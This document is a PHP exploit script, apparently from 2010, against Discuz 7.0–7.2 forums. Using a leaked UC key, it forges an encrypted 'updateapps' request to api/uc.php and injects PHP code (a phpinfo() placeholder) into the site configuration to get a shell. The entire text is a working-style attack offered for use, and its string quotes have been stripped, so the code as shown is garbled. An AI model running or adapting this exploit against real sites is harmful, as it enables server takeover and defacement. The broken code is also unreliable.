by:xhm1n9
#!/usr/bin/php
<?php
print_r(
+-------------------------------------------------------------------------------------------+
2010.2.6
discuz 7.0-7.2 get shell
exploit by xhming
site: http://hi.baidu.com/mr_xhming
+-------------------------------------------------------------------------------------------+
);
if ($argc < 3) {
print_r(
+-------------------------------------------------------------------------------------------+
error:php xxxx.com uc_ke
+-------------------------------------------------------------------------------------------+
);
exit;
}
error_reporting(7);
ini_set(max_execution_time, 0);
$host = $argv[1];
$uc_key = $argv[2];
$k=time();
$get=array(time=>$k,action=>updateapps);
$code=encode_arr($get,$uc_key);
$cmd = <<<xhming
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">);phpinfo();//</item> //插入的内容
<item id="bb">ffaaa</item>
</root>
xhming;
send($cmd);
function send($cmd)
{
global $host, $code;
$message = "POST "."/dz7.2/api/uc.php?code=$code HTTP/1.1
"; //路径看着改
$message .= "Content-Type: text/xml
";
$message .= "User-Agent: Apache XML RPC 3.0 (Jakarta Commons httpclient Transport)
";
$message .= "Host: $host
";
$message .= "Content-Length: ".strlen($cmd)."
";
$message .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = ;
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
function encode_arr($get,$uc_key) {
$tmp = ;
foreach($get as $key => $val) {
$tmp .= &.$key.=.$val;
}
return _authcode($tmp, ENCODE, $uc_key);
}
function _authcode($string, $operation = DECODE, $key = , $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == DECODE ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ;
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == DECODE ? base64_decode(substr($string, $ckey_length)) : sprintf(%010d, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = ;
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == DECODE) {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return ;
}
} else {
return $keyc.str_replace(=, , base64_encode($result));
}
}
?>
